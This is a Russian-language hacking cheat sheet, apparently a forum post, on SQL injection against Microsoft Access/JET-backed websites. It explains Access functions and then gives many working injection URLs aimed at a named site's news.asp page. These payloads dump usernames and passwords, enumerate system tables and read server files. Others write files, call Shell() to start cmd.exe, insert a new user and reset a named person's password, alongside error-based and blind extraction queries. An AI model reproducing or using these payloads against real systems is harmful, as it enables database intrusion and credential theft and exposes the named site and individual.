rnd() - Возвращает значение типа Single, содержащее случайное число. Функция Rnd возвращает значение
меньше 1 и не меньше нуля.

first(), last() - Возвращают значение поля из первой или последней записи в результирующем наборе, который
возвращается запросом.

iif() - Данная функция возвращает одну из двух частей в зависимости от результата вычисления выражения.
iif(выражение, если_истина, если_ложь)

min(), max() - Возвращают минимальное или максимальное из значений, содержащихся в заданном поле запроса.

count() - Вычисляет количество записей, возвращенных запросом.
...select+count(*)+as+AllUsers+from+Users
...select+count('ShippedDate & Freight')+from+Orders

chr() - Перевод строки в chr-представление (понадобится для обхода фильтрации)
сhr(10) возвращает знак переноса строки.

asc() - Перевод строки в ASCII-представление

mid() - Можно использовать для создания подзапроса. Цифра_1 указывает, с какого символа начинать выводить данные,
цифра_2 - сколько данных вывести
mid(значение,цифра_1,цифра_2)
Как-то так:
http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,mid(username%2bchr(58)%2bp assword,1),3,4,5,6,7,8,9,10,11+from+members%00

typename() - определение типа данных

date() - текущая дата
now - системное время

...select+top+25+username%2bchr(59)%2bpassword+fro m+members+where+id>10+order+by+id%00

...select+username%2bpassword%2bemail+from+members +order+by+username+with+owneraccess+option

...select+*+from+users+where+country+like+'U*'

...select+*+from+users+where+country+like+'U%'

...+select+top+1+members.password+from+members+whe re+members.username+alike+'admi_'%00
...+select+top+1+password+from+members+where+usern ame+like+'adm__'%00
...+select+top+1+password+from+members+where+(user name+like+"adm*")%00
...+select+top+1+password+from+members+where+usern ame+like+chr(97)%2bchr(100)%2bchr(109)%2bchr(105)% 2bchr(110)%00
...+select+top+1+password+from+members+where+usern ame+like+'[a-cA-C0-9]'%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysM odules2%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysA ccessObjects%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+MSysA ccessXML%00

SELECT id, email FROM users WHERE username='1' GROUP BY 1 HAVING '1'='1' and password=''

Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'id'
as part of an aggregate function.

SELECT id, email FROM users WHERE username='1' GROUP BY 1,id HAVING '1'='1' and password=''

SELECT id, email FROM users WHERE username='1' GROUP BY 1,id,email HAVING '1'='1' and password=''

Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression ''1'='1' and password='''
as part of an aggregate function.

Microsoft JET Database Engine (0x80040E21)
Cannot group on fields selected with '*'.

SELECT * FROM users WHERE username='1' HAVING sum('1')='1' and password=''

Microsoft JET Database Engine (0x80040E21)
You tried to execute a query that does not include the specified expression 'ID'
as part of an aggregate function.

SELECT * FROM users WHERE username='1' AND имя_колонки='1' and password=''

SELECT * FROM users WHERE username='1' UNION SELECT имя_колонки, null FROM имя_таблицы WHERE '1'='1' and password=''

SELECT * FROM users WHERE username='1' UNION SELECT TypeName(имя_колонки), null FROM имя_таблицы WHERE '1'='1' and password=''

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,typename(username),3,4,5,6 ,7,8,9,10,11+from+members%00

SELECT * FROM users WHERE username='1' UNION SELECT id FROM имя_таблицы IN 'путь_к_бд' WHERE '1'='1' and password=''

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from +ololo+in+'.'%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from +[TEXT;DATABASE=c:\windows\system32\inetsrv].[c:\some_name.txt]%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,*,3,4,5,6,7,8,9,10,11+from +[Excel+8.0;DATABASE=c:\ololo.xls].[sheet1$]%00

...FROM+[тип_данных;DATABASE=путь_к_бд].[путь_к_файлу]

...FROM+[ODBC;DRIVER=имя_драйвера]

CurDir() - Возвращает значение типа Variant (String), указывающее текущий путь.

Dir() - Возвращает значение типа String, определяющее имя файла, каталога или папки, которое соответствует указанному
шаблону, атрибуту файла либо метке тома диска.
dir('c:\')

FileDateTime() - Возвращает значение типа Variant (Date), указывающее дату и время создания или последнего изменения файла.
filedatetime('c:\boot.ini')

FileLen() - Возвращает значение типа Long, задающее длину файла в байтах.
filelen('c:\boot.ini')

GetAttr() - Данная функция возвращает значение типа Integer, представляющее атрибуты файла, каталога или папки.
getattr('c:\boot.ini')

Shell() - Запускает исполняемую программу и возвращает значение типа Variant (Double), содержащее код задачи этой программы, если
запуск прошел успешно; в противном случае возвращает нуль.
shell('c:\windows\system32\cmd.exe')

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+(select+1+union+select+2)+from+mem bers%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+or+(select+count(*)+from+members+group+by+mid(( rnd(0)*2),1))%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+insert+into+members+(id,username,password )+values+('999','some_name','password')%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+update+members+set+password=pass+where+us ername='anne.mckeon@providence.org'%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+IIf(False,CLng(0),%22%22)+as+a+int o+ololo%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+'param_pam_pam'+into+[TEXT;DATABASE=c:\windows\system32\inetsrv].[c:\windows\win_log.txt]%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=1+and+asc(mid((select+top+1+username+f rom+members),1,1))=97%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=iif((select+mid(last(username),1,1)+fr om+(select+top+1+username+from+members))='a',0,'no ')%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=1+and+1=0+or+'a'=iif((select+mid(last( username),1,1)+from+(select+top+1+username+from+me mbers))='a','a','b')%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassw ord,3,4,5,6,7,8,9,10,11+from+members+order+by+id%0 0

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+top+1+1,username,3,4,5,6,7,8,9,10, 11+from+members+where+username+not+in+(select+top+ 1+username+from+members)%00

http://www.spokanemarcom[antigoogle].com/news.asp?id=-99+union+select+1,(select+top+1+username+from+memb ers)%2bchr(58)%2b(select+top+1+username+from+membe rs+where+username+not+in+(select+top+1+username+fr om+members)),3,4,5,6,7,8,9,10,11+from+members%00

http://techonthenet.com/access/funct...ndex_alpha.php
http://office.microsoft.com/ru-ru/ac...410161049.aspx
http://office.microsoft.com/ru-ru/ac...441931049.aspx
http://office.microsoft.com/ru-ru/ac...410171049.aspx
http://office.microsoft.com/ru-ru/ac...410211049.aspx
http://technet.microsoft.com/ru-ru/l...76(en-us).aspx
https://forum.antichat.ru/thread50550.html
Материал
Видео Пашкелы по взлому аксесса Тулзой

З.Ы. Конструктивная критика и дополнения приветствуются (с)